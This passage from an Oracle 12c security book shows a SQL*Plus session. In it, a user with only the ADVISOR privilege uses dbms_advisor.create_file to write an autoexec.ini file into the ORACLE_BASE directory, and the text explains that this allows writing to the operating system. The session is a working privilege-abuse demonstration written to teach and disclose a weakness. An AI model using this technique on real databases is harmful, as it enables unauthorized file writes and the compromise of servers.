Database Reference
In-Depth Information
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options
ADTEST@192.168.1.2:1522/orcl4>select * from user_sys_privs;
USERNAME PRIVILEGE ADM COM
--------- ---------------------- --- ---
ADTEST SELECT ANY DICTIONARY NO NO
ADTEST CREATE SESSION NO YES
ADTEST ADVISOR NO YES
ADTEST@192.168.1.2:1522/orcl4>select * from user_role_privs;
no rows selected
ADTEST@192.168.1.2:1522/orcl4>select * from dba_role_privs where grantee='PUBLIC';
no rows selected
ADTEST@192.168.1.2:1522/orcl4>exec dbms_advisor.create_file ('malicious content',
'ORACLE_BASE','autoexec.ini');
PL/SQL procedure successfully completed.
ADTEST@192.168.1.2:1522/orcl4>select * from dba_tab_privs where table_name='ORACLE_BASE';
no rows selected
So the preceeding code has shown that a user with ADVISOR privilege can write to a DB directory location
without the need for privileges on that DB directory. Thus the default permissions in the 12c release are enough for
ADVISOR to write to the OS. What does this mean in terms of security? Well, a user with ADVISOR can write to the
root of a
C:/
drive, as shown in Figure
10-1
.
